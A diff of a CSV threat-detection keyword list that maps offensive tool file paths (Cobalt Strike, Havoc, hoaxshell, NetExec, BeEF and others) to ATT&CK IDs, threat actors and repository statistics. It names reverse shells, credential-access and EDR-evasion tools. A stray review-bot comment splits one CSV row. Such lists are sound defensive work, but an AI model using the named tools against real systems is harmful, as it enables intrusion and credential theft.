tools","https://github.com/HarmJ0y","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/HaryyUser.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*/hashcat*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/HaryyUser.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/hash_spider.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - 
T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/hashcat*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/hashdump_dc*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Hashi0x/*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","","N/A","","","" -"*/hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*/hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" "*/havex.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*/Havoc.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Havoc.qss*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Havoc.rc*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Havoc/data/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Havoc/main/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/HavocFramework/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" 
-"*/HavocImages/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/havoc-py/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/Havoc.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc.qss*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc.rc*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 
- T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc/data/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc/main/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/HavocFramework/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/HavocImages/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/havoc-py/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/hbase-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hbase-region-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hddtemp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -3768,22 +3787,22 @@ "*/HeapCrypt.git*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*/HellsGate.git*","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","8","723","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*/Heroinn/*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" -"*/hid_inject.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/hid_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 
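Review bot: The two NetExec rows added in the `@@ -3743,24 +3760,26 @@` hunk (`*/handlekatz.py*` and `*/hash_spider.py*`) are labelled `Credential Access`, but their tactics column is `TA0007 - TA0003 - TA0002 - TA0001` and their techniques are `T1069 - T1021 - T1136 - T1018`, so neither carries the credential-access tactic `TA0006` or any credential-dumping technique. Anyone filtering or prioritising alerts by the ATT&CK columns would miss both rows; I would append `TA0006` to the tactics and, if these modules do dump LSASS as their names suggest (to be confirmed against the NetExec source), add `T1003.001` to the techniques. The rows also disagree on `metadata_enable_proxy_detection`: `*/handlekatz.py*` has `"1"` and `*/hash_spider.py*` has `"0"`, although both are the same kind of path pattern for the same repository. One value should be used for both, whichever the list's convention for script-path keywords is.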
- TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/HiddenDesktop.git*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" -"*/hijack_opener/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/hijack_opener/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*/HijackHunter/*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/hid_inject.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/hid_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/HiddenDesktop.git*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"*/hijack_opener/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/hijack_opener/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/HijackHunter/*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/HInvoke.cs*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*/hlldz*","offensive_tool_keyword","Github Username","github username. 'My name is Halil Dalabasmaz. I consider myself Pwner.' containing exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/hlldz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hnap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hoaxshell*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" -"*/hoaxshell/*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*/holehe.git*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*/hoaxshell/*.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*/holehe.git*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "*/hollow.x64.*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/HOLLOW","1","1","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" -"*/HookDetector.exe*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*/hooks/spoof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 